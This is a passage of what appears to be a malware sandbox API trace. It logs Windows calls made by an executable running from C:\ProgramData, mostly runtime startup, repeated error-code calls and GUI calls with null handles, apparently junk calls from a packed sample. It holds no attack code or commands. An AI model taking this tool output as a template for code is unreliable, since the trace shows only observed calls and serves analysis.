(hModule=0x75ce0000, lpProcName="FlsAlloc") returned 0x75cf4f2b [0083.819] GetProcAddress (hModule=0x75ce0000, lpProcName="FlsGetValue") returned 0x75cf1252 [0083.820] GetProcAddress (hModule=0x75ce0000, lpProcName="FlsSetValue") returned 0x75cf4208 [0083.820] GetProcAddress (hModule=0x75ce0000, lpProcName="FlsFree") returned 0x75cf359f [0083.821] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75ce0000 [0083.821] GetCurrentThreadId () returned 0x550 [0083.821] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\BCE1010314.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x5582f736, hStdOutput=0x5582fa6f, hStdError=0x1e707d0)) [0083.821] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.821] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0083.821] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.821] SetHandleCount (uNumber=0x20) returned 0x20 [0083.821] GetCommandLineA () returned="\"C:\\ProgramData\\BCE1010314.exe\" " [0083.821] GetEnvironmentStringsW () returned 0x38cb58* [0083.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1409 [0083.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x1e711f8, cbMultiByte=1409, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1409 [0083.821] FreeEnvironmentStringsW (penv=0x38cb58) returned 1 [0083.821] GetLastError () returned 0x65b [0083.821] SetLastError (dwErrCode=0x65b) [0083.821] GetLastError () returned 0x65b [0083.821] SetLastError (dwErrCode=0x65b) [0083.822] GetLastError () returned 0x65b [0083.822] SetLastError (dwErrCode=0x65b) [0083.822] GetACP () returned 0x4e4 [0083.822] GetLastError () returned 0x65b [0083.822] SetLastError (dwErrCode=0x65b) [0083.822] IsValidCodePage (CodePage=0x4e4) returned 1 [0083.822] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0083.822] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0083.822] GetLastError () returned 0x65b [0083.822] SetLastError (dwErrCode=0x65b) [0083.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0083.822] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0083.822] GetLastError () returned 0x65b [0083.822] SetLastError (dwErrCode=0x65b) [0083.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㶔㙁䱳喃Ā") returned 256 [0083.822] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㶔㙁䱳喃Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0083.822] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㶔㙁䱳喃Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0083.822] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x84f¶1\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0083.822] GetLastError () returned 0x65b [0083.822] SetLastError (dwErrCode=0x65b) [0083.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.822] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㶔㙁䱳喃Ā") returned 256 [0083.822] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㶔㙁䱳喃Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0083.822] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㶔㙁䱳喃Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0083.822] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x84f¶1\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0083.822] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x55842c78, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.823] SetLastError (dwErrCode=0x0) [0083.823] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.824] SetLastError (dwErrCode=0x0) [0083.824] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.825] GetLastError () returned 0x0 [0083.825] SetLastError (dwErrCode=0x0) [0083.826] GetLastError () returned 0x0 [0083.826] SetLastError (dwErrCode=0x0) [0083.826] GetLastError () returned 0x0 [0083.826] SetLastError (dwErrCode=0x0) [0083.826] GetLastError () returned 0x0 [0083.826] SetLastError (dwErrCode=0x0) [0083.826] GetLastError () returned 0x0 [0083.826] SetLastError (dwErrCode=0x0) [0083.826] GetLastError () returned 0x0 [0083.826] SetLastError (dwErrCode=0x0) [0083.826] GetLastError () returned 0x0 [0083.826] SetLastError (dwErrCode=0x0) [0083.826] GetLastError () returned 0x0 [0083.826] SetLastError (dwErrCode=0x0) [0083.826] GetLastError () returned 0x0 [0083.826] SetLastError (dwErrCode=0x0) [0083.826] GetLastError () returned 0x0 [0083.826] SetLastError (dwErrCode=0x0) [0083.827] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0083.827] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0083.827] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x558339aa) returned 0x0 [0083.827] GetLastError () returned 0x0 [0083.827] SetLastError (dwErrCode=0x0) [0083.827] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.828] SetLastError (dwErrCode=0x0) [0083.828] GetLastError () returned 0x0 [0083.829] SetLastError (dwErrCode=0x0) [0083.829] GetLastError () returned 0x0 [0083.829] SetLastError (dwErrCode=0x0) [0083.829] GetLastError () returned 0x0 [0083.829] SetLastError (dwErrCode=0x0) [0083.829] GetLastError () returned 0x0 [0083.829] SetLastError (dwErrCode=0x0) [0083.829] GetLastError () returned 0x0 [0083.829] SetLastError (dwErrCode=0x0) [0083.829] GetLastError () returned 0x0 [0083.829] SetLastError (dwErrCode=0x0) [0083.829] GetLastError () returned 0x0 [0083.829] SetLastError (dwErrCode=0x0) [0083.829] GetLastError () returned 0x0 [0083.829] SetLastError (dwErrCode=0x0) [0083.829] GetLastError () returned 0x0 [0083.829] SetLastError (dwErrCode=0x0) [0083.829] GetLastError () returned 0x0 [0083.829] SetLastError (dwErrCode=0x0) [0083.829] GetLastError () returned 0x0 [0083.829] SetLastError (dwErrCode=0x0) [0083.829] GetLastError () returned 0x0 [0083.829] SetLastError (dwErrCode=0x0) [0083.830] IsClipboardFormatAvailable (format=0x0) returned 0 [0083.830] IsDlgButtonChecked (hDlg=0x0, nIDButton=0) returned 0x0 [0083.831] InflateRect (in: lprc=0x18f7a8, dx=1, dy=1 | out: lprc=0x18f7a8) returned 1 [0083.831] GetFocus () returned 0x0 [0083.831] GetConsoleTitleA (in: lpConsoleTitle=0x181870, nSize=0x400 | out: lpConsoleTitle="") returned 0x0 [0083.831] GetLastError () returned 0x578 [0083.831] SetLastError (dwErrCode=0x578) [0083.831] UpdateWindow (hWnd=0x76f) returned 0 [0083.831] GetLastError () returned 0x578 [0083.831] CreateMenu () returned 0x100ed [0083.831] CreatePopupMenu () returned 0x100ef [0083.831] CreatePopupMenu () returned 0x100f1 [0083.831] SetMenu (hWnd=0x0, hMenu=0x100ed) returned 0 [0083.831] SetCapture (hWnd=0x0) returned 0x0 [0083.831] InvalidateRect (hWnd=0x0, lpRect=0x0, bErase=1) returned 1 [0083.834] OleLoadPicture () returned 0x80004003 [0083.834] InvalidateRect (hWnd=0x0, lpRect=0x0, bErase=1) returned 1 [0083.834] QuerySecurityPackageInfoA (in: pszPackageName=0x0, ppPackageInfo=0x0 | out: ppPackageInfo=0x0) returned 0x80090305 [0084.550] GetCapture () returned 0x0 [0084.551] BeginPaint (in: hWnd=0x0, lpPaint=0x18eaf0 | out: lpPaint=0x18eaf0) returned 0x0 [0084.551] EndPaint (hWnd=0x0, lpPaint=0x18eaf0) returned 0 [0084.551] NtdllDefWindowProc_A (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0084.609] GetDeviceCaps (hdc=0x1, index=4) returned 0 [0084.609] GetDeviceCaps (hdc=0x1, index=6) returned 0 [0084.610] GetDeviceCaps (hdc=0x1, index=8) returned 0 [0084.610] 